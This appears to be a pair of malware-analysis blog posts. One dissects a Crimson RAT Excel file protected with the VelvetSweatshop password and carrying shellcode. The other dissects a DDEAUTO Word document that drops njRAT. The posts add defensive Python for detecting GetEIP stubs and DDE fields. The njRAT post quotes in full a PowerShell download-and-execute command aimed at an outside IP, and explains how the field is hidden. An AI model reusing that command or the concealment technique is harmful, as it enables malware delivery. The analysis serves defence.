Crimson Rat (02-24-2020): VelvetSweatshop and shellcode

A few days ago, @killamjr outlined the steps he used to analyze this document. I hadn’t done much with other tools like XORsearch or scdbg.exe, so I decided to give it a go.

It didn’t go so well. But thanks to @killamjr’s help, updating all of Didier Stevens’ tools, and this SANS blog post, it all worked out fine. Let’s work through it.

First things first, let’s use oledump.py to see what lies underneath this document.


Instead of macros or vbaProject.bin files, we see ‘EncryptedPackage’. This means that the document itself has been protected with a password. However, if we try to open the document, it won’t prompt for a password at all. What can we do from here? msoffcrypto-crack.py is a simple tool that can be used to crack passwords on MS documents. Running that tool gives us the password:


VelvetSweatshop? There’s only one man who would have a password like that.

Why didn’t I name this blog the Velvet Jones School of Technology?

Anyway, even though we know the password, there’s no place for us to put it in the document so that we can get access to the macros like we normally would. (VelvetSweatshop is Excel’s built-in default password; Excel tries it silently when opening a file, which is why we never saw a prompt.) But at this point we have two options.

We could run msoffcrypto-crack.py on the document and use the output option (-o) to save the cracked file. We could then use OfficeMalScanner with inflate to dump all of the macros and .bin files.

Option 1: Output to cracked file and use OfficeMalScanner

Instead, we will pipe the output from msoffcrypto-crack.py directly into oledump.py. We still need the output option (-o), together with ‘-’ so that the output goes to stdout. All of that gets piped into oledump.py.

Option 2: Output directly into oledump.py

We can now see that streams A3 – A6 have macros. They might be worth investigating. Stream B3 is large enough that it may contain something interesting as well. But stream C2’s name is ‘EQuAtIOn NatiVE’. This can contain shellcode or other encoded commands. That one is definitely worth looking at.

To do so, we need to add a few more options to oledump.py. We want to select stream C2 (-s C2) and then dump it (-d) out to a file. We’ll call it oledump.bin.


Running strings on oledump.bin doesn’t give us much of anything at all.


Since strings finds nothing readable, the .bin file is likely shellcode, possibly encoded. To decode the binary, we will be using the tool XORsearch.exe. From the website:

XORSearch is a program to search for a given string in an XOR, ROL, ROT or SHIFT encoded binary file… XORSearch will try all XOR keys (0 to 255), ROL keys (1 to 7), ROT keys (1 to 25) and SHIFT keys (1 to 7) when searching.

We will also be using the -W option to make use of XORsearch’s built-in signatures.


It looks like a GetEIP instruction was found at position 0x2A7 without any encoding at all (XOR 00).
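The search XORsearch performs here can be reproduced in a few lines. The block below is an added example, not code from this post or from Didier Stevens’ tools: it brute-forces the XOR keys 0 to 255 and the ROL keys 1 to 7 over a buffer and reports every offset where a GetEIP pattern appears, which is what -W does for the GetEIP signatures. The two signatures (a `call $+5` and the `fldz; fnstenv` pair) are my own choice of common GetEIP stubs, not XORsearch’s actual signature list, and the ROT and SHIFT modes are left out. The sample buffer is constructed so that the stub lands at offset 0x2A7, matching the hit in the post; it is not the real oledump.bin.

```python
# Brute-force search for GetEIP markers under XOR and ROL encodings (what XORSearch -W does).
from typing import Dict, List, Tuple

# Two byte sequences that GetEIP stubs commonly use. This is my own selection (an assumption);
# XORSearch's own signature list is not reproduced here.
GETEIP_SIGNATURES: Dict[str, bytes] = {
    "call $+5": bytes.fromhex("E800000000"),        # call next instruction, then pop the return address
    "fldz/fnstenv": bytes.fromhex("D9EED97424F4"),  # fldz; fnstenv [esp-0xC]: saved FPU EIP on the stack
}

Hit = Tuple[str, int, int, str]  # (encoding, key, offset, signature name)


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte (encoding and decoding are the same operation)."""
    return bytes(b ^ key for b in data)


def rol_bytes(data: bytes, bits: int) -> bytes:
    """Rotate every byte left by `bits` (1..7); rotating by 8 - bits undoes it."""
    return bytes(((b << bits) | (b >> (8 - bits))) & 0xFF for b in data)


def search_encoded(data: bytes, signatures: Dict[str, bytes] = GETEIP_SIGNATURES) -> List[Hit]:
    """Try XOR keys 0..255 and ROL keys 1..7 and report every signature match in the decoded data."""
    hits: List[Hit] = []
    candidates = [("XOR", key, xor_bytes(data, key)) for key in range(256)]
    candidates += [("ROL", bits, rol_bytes(data, bits)) for bits in range(1, 8)]
    for encoding, key, decoded in candidates:
        for name, sig in signatures.items():
            off = decoded.find(sig)
            while off != -1:
                hits.append((encoding, key, off, name))
                off = decoded.find(sig, off + 1)
    return hits


def format_hits(hits: List[Hit]) -> List[str]:
    """Render hits in the same spirit as XORSearch's 'Found XOR 00 position 02A7' lines."""
    return [f"Found {enc} {key:02X} position {off:04X}: GetEIP ({name})" for enc, key, off, name in hits]


# Constructed sample: 0x2A7 bytes of filler whose consecutive bytes never repeat (so no
# accidental matches), followed by a call $+5 / pop ebx / ret stub. Not the real dumped stream.
_FILLER = bytes((i * 37 + 11) & 0xFF for i in range(0x2A7))
SAMPLE_SHELLCODE = _FILLER + bytes.fromhex("E800000000") + bytes.fromhex("5BC3")

if __name__ == "__main__":
    # Unencoded buffer: the stub is found with XOR key 00 at 02A7, as in the post.
    for line in format_hits(search_encoded(SAMPLE_SHELLCODE)):
        print(line)
    # The same buffer XOR-encoded with 0x5A: the search recovers the key and the offset.
    for line in format_hits(search_encoded(xor_bytes(SAMPLE_SHELLCODE, 0x5A))):
        print(line)
```

A real run would read oledump.bin from disk (`open("oledump.bin", "rb").read()`) and pass it to `search_encoded`; the offset reported for the unencoded hit is what goes into scdbg as the start offset.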

With our shellcode (oledump.bin) and offset (0x2A7) in hand, we can make use of a shellcode analyzer/emulator called scdbg.exe. There are two ways we can use it. We can use the GUI: point it at oledump.bin, add the Start Offset, click Launch, and the decoded shellcode appears.

scdbg: gui_launcher.exe

Or we can use the command line version. We just need to point it at the file (option -f) and give it the offset of 2A7 (option -foff). We should get the same output.

scdbg.exe with options -f and -foff

Note that we see the URL from which the file is going to be downloaded and also the location where it will be dropped.

Thanks for reading!


NJRAT (1.31.2020) – Malicious Document & DDEAUTO

DDEAUTO, which stands for automatic dynamic data exchange, is a feature in Microsoft Word that allows someone to pull data from one file directly into another file. It is supposed to work only within the application itself or if the two necessary applications are open.

It also has the ability to start cmd.exe. What could go wrong?

We will be working off of this document HERE. It downloads what was identified as njrat. That can be found HERE.

Document Behavior

Upon opening the document, we see this alert. Note how it says that the document contains links that may refer to other files. This is your clue that it is using DDEAUTO. If you choose yes, it will ‘update this document with the data from the linked files’.


Clicking yes gives us the following alert. Note that the bad things haven’t happened just yet, but if we choose yes again, they will start to happen. We can see the warning that the remote data is not accessible. Shall we instead start an application? Of course!


We can now see what happens next. WINWORD.EXE spawns cmd.exe, which then spawns powershell.exe.


What commands get executed here? Double-clicking on cmd.exe above (I was watching the processes spawn in Process Hacker) shows the following command line:

C:\Programs\Collection\MSWord\..\..\..\..\windows\system32\cmd.exe /k powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('http[:]//208[.]167[.]245[.]254/signed1.exe','1.exe');start '1.exe'

It is not that difficult to see how this command works. Cmd.exe spawns powershell.exe, which downloads an executable, renames it, and then starts it.

Where can we find it in the document?

If we have the formatting symbols and paragraph marks turned on in Word, we can see that the body is not completely blank. If we highlight those characters, we can see that there is some text in white.


I will also be making the text red to make it easier to see. Right-clicking on the Russian characters, we see the option to Toggle Field Codes.


Selecting that option, we see the string pop out.


Notice the carriage return symbol above. If we right-click on that and also choose Toggle Field Codes, the following appears.


And the numbers above translate into { QUOTE PowerShell }
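Everything the last few screenshots did by hand (toggling the field codes and turning the QUOTE numbers back into text) can be checked from the XML inside the .docx, which is just a zip file holding word/document.xml. The block below is an added example, not part of the original post: it walks the document XML, joins the instruction text of each field across runs and nested fields, decodes a `QUOTE` field given as decimal character codes, and flags any field whose instruction starts with DDE or DDEAUTO. The document XML is a constructed sample modelled on the field shown above; it is not taken from the actual malicious document, and the `scan_docx` helper is my own name for reading a real file.

```python
# Find DDE/DDEAUTO fields in WordprocessingML, including ones hidden behind nested { QUOTE ... }.
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def w(tag: str) -> str:
    """Qualify a WordprocessingML tag or attribute name with its namespace."""
    return f"{{{W_NS}}}{tag}"


# A field instruction beginning with DDE or DDEAUTO asks Word to talk to another application.
DDE_RE = re.compile(r"^\s*DDE(AUTO)?\b", re.IGNORECASE)
# { QUOTE 80 111 ... }: decimal character codes that Word renders as text.
QUOTE_CODES_RE = re.compile(r"^\s*QUOTE\s+((?:\d+\s*)+)$", re.IGNORECASE)


def decode_quote_field(instr: str):
    """Return the text a numeric QUOTE field renders to, or None if the instruction is not one."""
    m = QUOTE_CODES_RE.match(instr)
    if not m:
        return None
    return "".join(chr(int(code)) for code in m.group(1).split())


def extract_fields(document_xml) -> list:
    """Collect every field instruction in document order.

    Complex fields span several runs (fldChar begin, instrText runs, fldChar end) and may
    nest. A nested field's rendered result is spliced into its parent's instruction, which
    is exactly how { QUOTE ... } supplies the word PowerShell to the DDEAUTO command.
    """
    root = ET.fromstring(document_xml)
    stack = []   # one list of instruction fragments per currently open field
    fields = []
    for el in root.iter():
        if el.tag == w("fldSimple"):
            fields.append((el.get(w("instr")) or "").strip())
        elif el.tag == w("fldChar"):
            kind = el.get(w("fldCharType"))
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                instr = "".join(stack.pop())
                fields.append(instr.strip())
                if stack:  # nested field: the parent sees the child's rendered text
                    rendered = decode_quote_field(instr)
                    stack[-1].append(rendered if rendered is not None else instr)
        elif el.tag == w("instrText") and stack:
            stack[-1].append(el.text or "")
    return fields


def find_dde_fields(document_xml) -> list:
    """Return the fully assembled instructions of all DDE/DDEAUTO fields."""
    return [f for f in extract_fields(document_xml) if DDE_RE.match(f)]


def scan_docx(path: str) -> list:
    """Run the same check on a real .docx (a zip archive containing word/document.xml)."""
    with zipfile.ZipFile(path) as archive:
        return find_dde_fields(archive.read("word/document.xml"))


# Constructed sample modelled on the post's field: a harmless PAGE field, then a DDEAUTO
# field whose command line gets the word PowerShell from a nested numeric QUOTE field.
SAMPLE_DOCUMENT_XML = r"""<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple>
    </w:p>
    <w:p>
      <w:r><w:fldChar w:fldCharType="begin"/></w:r>
      <w:r><w:instrText xml:space="preserve"> DDEAUTO c:\windows\system32\cmd.exe "/k </w:instrText></w:r>
      <w:r><w:fldChar w:fldCharType="begin"/></w:r>
      <w:r><w:instrText xml:space="preserve"> QUOTE 80 111 119 101 114 83 104 101 108 108 </w:instrText></w:r>
      <w:r><w:fldChar w:fldCharType="end"/></w:r>
      <w:r><w:instrText xml:space="preserve"> -NoP" </w:instrText></w:r>
      <w:r><w:fldChar w:fldCharType="separate"/></w:r>
      <w:r><w:t>field result shown in the document body</w:t></w:r>
      <w:r><w:fldChar w:fldCharType="end"/></w:r>
    </w:p>
  </w:body>
</w:document>
"""

if __name__ == "__main__":
    for instr in find_dde_fields(SAMPLE_DOCUMENT_XML):
        print("DDE field:", instr)
```

Running it on the sample prints the assembled DDEAUTO instruction with the word PowerShell already substituted, which is the view Word only gives you after toggling both field codes; on a real file, `scan_docx("suspect.docx")` does the same from the zip.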

As far as creating your own document like this (for testing purposes, of course), there are many blogs/videos that show how it is done. This one seemed rather promising:

Thanks for reading!